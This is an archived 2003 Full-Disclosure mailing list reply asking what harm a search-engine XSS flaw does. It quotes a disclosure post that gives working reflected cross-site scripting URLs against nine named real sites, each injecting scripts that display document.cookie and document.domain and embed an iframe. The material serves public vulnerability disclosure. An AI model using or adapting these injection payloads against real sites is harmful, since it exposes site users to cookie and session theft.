Re: [Full-Disclosure] Search Engine XSS

From: Shanphen Dawa (list_at_hardlined.com)
Date: 07/23/03

  • Next message: lee.e.rian_at_census.gov: "RE: [Full-Disclosure] Re: Cisco IOS Denial of Service that affects most Cisco IOS routers- requires power cycle to recover"
    To: full-disclosure@lists.netsys.com
    Date: Wed, 23 Jul 2003 13:02:36 -0500
    
    

    Yes but what affect does this have on the server? How does it comprimise security? Can you use this to DoS the server? Can you use this to gain access to areas on the server otherwise not available?

    On Wed, 23 Jul 2003 02:18:05 -0700
    "morning_wood" <se_cur_ity@hotmail.com> wrote:

    > since were on the subject now... ill clear up my backlog...
    >
    > Sites Affected...
    >
    > Overture
    > Altavista
    > MetaCrawler
    > Excite
    > Webcrawler
    > InfoPlease
    > MarketWatch
    > Icq
    > Looksmart
    >
    >
    >
    > http://www.overture.com/d/search/;$sessionid$EVV5ZDIABJG13QFIEEOQPUQ?Keywords=%3cscript%3ealert%28%22You+are+vunerable+to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSCRIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e
    >
    > http://www.altavista.com/web/results?pg=q&user=icq&q=%3cscript%3ealert%28%22You+are+vunerable+to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSCRIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e
    >
    > http://www.metacrawler.com/_1_2IWUTDE03H14GMK__info.metac/dog/webresults.htm?&qkw=%3cscript%3ealert%28%22You+are+vunerable+to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSCRIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e&qcat=web&method=0&top=1&start=&ver=4049
    >
    > http://msxml.excite.com/_1_GMJTDE03H58B8U__info.xcite/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw=%3cscript%3ealert%28%22You+are+vunerable+to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSCRIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e&start=&ver=13896
    >
    > http://dpxml.webcrawler.com/_1_HEMTDE03GPDFH2__info.wbcrwl/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw=%3cscript%3ealert%28%22You+are+vunerable+
    > to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%
    > 3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSC
    > RIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%
    > 3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e&start=&ver=22324
    >
    > http://www.infoplease.com/search.php3?src=icq&query=%3cscript%3ealert%28%22You+are+vunerable+to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSCRIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e&in=all
    >
    > http://bigcharts.marketwatch.com/symbollookup/symbollookupresults.asp?symb=>alert("You%20are%20vunerable%20to%20xss%20-%20discovered%20by%20morning_wood%20http://exploitlabs.com")</script><SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT><iframe%20src="http://whatismyip.com"></iframe>&country=all&type=all
    >
    > http://search.icq.com/search/results?q=%3Cscript%3Ealert%28%22You+are+vunerable+to+xss+%2D+discovered+by+morning%5Fwood+http%3A%2F%2Fexploitlabs%2Ecom%22%29%3C%2Fscript%3E%3CSCRIPT%3Ealert%28document%2Edomain%29%3B%3C%2FSCRIPT%3E%3CSCRIPT%3Ealert%28document%2Ecookie%29%3B%3C%2FSCRIPT%3E%3Ciframe+src%3D%22http%3A%2F%2Fwhatismyip%2Ecom%22%3E%3C%2Fiframe%3E
    >
    > http://www.looksmart.com/r_search?l&key=%3cscript%3ealert%28%22You+are+vunerable+to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSCRIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e&search=0
    >
    > this just shows the basics, some are worse than others...
    > so I guess thats all of em...
    >
    > Donnie Werner
    > morning_wood@exploitlabs.com
    > http://exploitlabs.com
    >
    >
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter: http://lists.netsys.com/full-disclosure-charter.html
    >

    -- 
    /*
    "To avoid all evil, to cultivate good, 
    and to cleanse one's mind  
    this is the teaching of the Buddhas."
    Martin Ekendahl
    http://www.hardlined.com
    martin@hardlined.com
    */
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
    

  • Next message: lee.e.rian_at_census.gov: "RE: [Full-Disclosure] Re: Cisco IOS Denial of Service that affects most Cisco IOS routers- requires power cycle to recover"

    Relevant Pages

    • Re: TCP/IP comms problems between WinXP and DOS
      ... I have written client and server versions ... In the instance where I have a problem the DOS system is running as client, ... By simple changing of i/p addresses / network names I have run the client ...
      (microsoft.public.dotnet.languages.vc)
    • Re: DOS Printing from Windows Server 2003 TS?
      ... STAT-NT03 is the TS server name. ... We will see if it works for the 5 remote users over the Internet. ... We have a customer who is still using and old DOS version of software ... could not find anything except a Kixstart script. ...
      (microsoft.public.windows.terminal_services)
    • RE: DOS ATTACK
      ... Subject: DOS ATTACK ... server which I guess is your problem. ... block traffic based on referrer. ...
      (Incidents)
    • Re: Ports that are open on a Server
      ... The server is not an internet server, ... mail server already behind a firewall. ... The DoS that I ...
      (microsoft.public.win2000.security)
    • NWClient: Was machen vipx.exe und vlmsup.exe? (Probleme mit alter DOS Software)
      ... Alte DOS Software, die gegen 3.2 Server bei div. ... Prog offensichtlich Daten nicht geliefert bekommt ... Laut Error Counter NIC Server, sowie Cisco Switch ist das Netz OK, ...
      (de.comp.sys.novell)